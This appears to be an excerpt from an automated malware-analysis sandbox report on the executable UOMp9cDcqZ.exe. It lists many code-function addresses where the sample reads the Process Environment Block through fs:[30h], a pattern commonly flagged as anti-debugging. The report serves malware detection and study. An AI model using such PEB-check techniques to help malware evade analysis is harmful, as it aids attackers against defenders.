Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]		2_2_013B3D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C4120 mov ecx, dword ptr fs:[00000030h]		2_2_013C4120
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]		2_2_013A9100
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]		2_2_013A9100
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]		2_2_013A9100
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]		2_2_013AB171
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]		2_2_013AB171
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]		2_2_013CC577
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]		2_2_013CC577
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AC962 mov eax, dword ptr fs:[00000030h]		2_2_013AC962
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C7D50 mov eax, dword ptr fs:[00000030h]		2_2_013C7D50
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478D34 mov eax, dword ptr fs:[00000030h]		2_2_01478D34
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0142A537 mov eax, dword ptr fs:[00000030h]		2_2_0142A537
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]		2_2_013CB944
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]		2_2_013CB944
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E3D43 mov eax, dword ptr fs:[00000030h]		2_2_013E3D43
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146E539 mov eax, dword ptr fs:[00000030h]		2_2_0146E539
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]		2_2_013D1DB5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]		2_2_013D1DB5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]		2_2_013D1DB5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov ecx, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]		2_2_01426DC9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D35A1 mov eax, dword ptr fs:[00000030h]		2_2_013D35A1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]		2_2_013D61A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]		2_2_013D61A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]		2_2_0146FDE2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]		2_2_0146FDE2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]		2_2_0146FDE2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]		2_2_0146FDE2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]		2_2_013DFD9B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]		2_2_013DFD9B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014341E8 mov eax, dword ptr fs:[00000030h]		2_2_014341E8
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2990 mov eax, dword ptr fs:[00000030h]		2_2_013D2990
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]		2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]		2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]		2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]		2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]		2_2_013A2D8A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01458DF1 mov eax, dword ptr fs:[00000030h]		2_2_01458DF1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA185 mov eax, dword ptr fs:[00000030h]		2_2_013DA185
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]		2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]		2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]		2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]		2_2_013D2581
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CC182 mov eax, dword ptr fs:[00000030h]		2_2_013CC182
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]		2_2_013AB1E1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]		2_2_013AB1E1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]		2_2_013AB1E1
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]		2_2_013BD5E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]		2_2_013BD5E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014269A6 mov eax, dword ptr fs:[00000030h]		2_2_014269A6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]		2_2_014705AC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]		2_2_014705AC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]		2_2_014251BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]		2_2_014251BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]		2_2_014251BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]		2_2_014251BE
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]		2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]		2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]		2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]		2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]		2_2_013D002D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]		2_2_013BB02A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]		2_2_013BB02A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]		2_2_013BB02A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]		2_2_013BB02A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DBC2C mov eax, dword ptr fs:[00000030h]		2_2_013DBC2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]		2_2_0143C450
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]		2_2_0143C450
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01471074 mov eax, dword ptr fs:[00000030h]		2_2_01471074
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01462073 mov eax, dword ptr fs:[00000030h]		2_2_01462073
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]		2_2_01461C06
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]		2_2_01426C0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]		2_2_01426C0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]		2_2_01426C0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]		2_2_01426C0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]		2_2_0147740D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]		2_2_0147740D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]		2_2_0147740D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C746D mov eax, dword ptr fs:[00000030h]		2_2_013C746D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]		2_2_01474015
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]		2_2_01474015
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]		2_2_01427016
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]		2_2_01427016
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]		2_2_01427016
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]		2_2_013C0050
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]		2_2_013C0050
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA44B mov eax, dword ptr fs:[00000030h]		2_2_013DA44B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DF0BF mov ecx, dword ptr fs:[00000030h]		2_2_013DF0BF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]		2_2_013DF0BF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]		2_2_013DF0BF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478CD6 mov eax, dword ptr fs:[00000030h]		2_2_01478CD6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E90AF mov eax, dword ptr fs:[00000030h]		2_2_013E90AF
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov ecx, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]		2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]		2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B849B mov eax, dword ptr fs:[00000030h]		2_2_013B849B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]		2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]		2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]		2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9080 mov eax, dword ptr fs:[00000030h]		2_2_013A9080
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014614FB mov eax, dword ptr fs:[00000030h]		2_2_014614FB
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]		2_2_01423884
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]		2_2_01423884
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A58EC mov eax, dword ptr fs:[00000030h]		2_2_013A58EC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DE730 mov eax, dword ptr fs:[00000030h]		2_2_013DE730
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]		2_2_013A4F2E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]		2_2_013A4F2E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478B58 mov eax, dword ptr fs:[00000030h]		2_2_01478B58
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CF716 mov eax, dword ptr fs:[00000030h]		2_2_013CF716
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478F6A mov eax, dword ptr fs:[00000030h]		2_2_01478F6A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]		2_2_013DA70E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]		2_2_013DA70E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]		2_2_013D3B7A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]		2_2_013D3B7A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]		2_2_0147070D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]		2_2_0147070D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]		2_2_0143FF10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]		2_2_0143FF10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013ADB60 mov ecx, dword ptr fs:[00000030h]		2_2_013ADB60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BFF60 mov eax, dword ptr fs:[00000030h]		2_2_013BFF60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146131B mov eax, dword ptr fs:[00000030h]		2_2_0146131B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AF358 mov eax, dword ptr fs:[00000030h]		2_2_013AF358
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013ADB40 mov eax, dword ptr fs:[00000030h]		2_2_013ADB40
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BEF40 mov eax, dword ptr fs:[00000030h]		2_2_013BEF40
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]		2_2_014253CA
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]		2_2_014253CA
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]		2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]		2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]		2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2397 mov eax, dword ptr fs:[00000030h]		2_2_013D2397
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DB390 mov eax, dword ptr fs:[00000030h]		2_2_013DB390
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B8794 mov eax, dword ptr fs:[00000030h]		2_2_013B8794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]		2_2_013B1B8F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]		2_2_013B1B8F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0145D380 mov ecx, dword ptr fs:[00000030h]		2_2_0145D380
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E37F5 mov eax, dword ptr fs:[00000030h]		2_2_013E37F5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146138A mov eax, dword ptr fs:[00000030h]		2_2_0146138A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CDBE9 mov eax, dword ptr fs:[00000030h]		2_2_013CDBE9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]		2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]		2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]		2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]		2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01475BA5 mov eax, dword ptr fs:[00000030h]		2_2_01475BA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]		2_2_0146AE44
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]		2_2_0146AE44
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]		2_2_013E4A2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]		2_2_013E4A2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0146EA55 mov eax, dword ptr fs:[00000030h]		2_2_0146EA55
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01434257 mov eax, dword ptr fs:[00000030h]		2_2_01434257
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AE620 mov eax, dword ptr fs:[00000030h]		2_2_013AE620
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013C3A1C mov eax, dword ptr fs:[00000030h]		2_2_013C3A1C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]		2_2_013DA61C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]		2_2_013DA61C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]		2_2_0145B260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]		2_2_0145B260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478A62 mov eax, dword ptr fs:[00000030h]		2_2_01478A62
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]		2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A5210 mov ecx, dword ptr fs:[00000030h]		2_2_013A5210
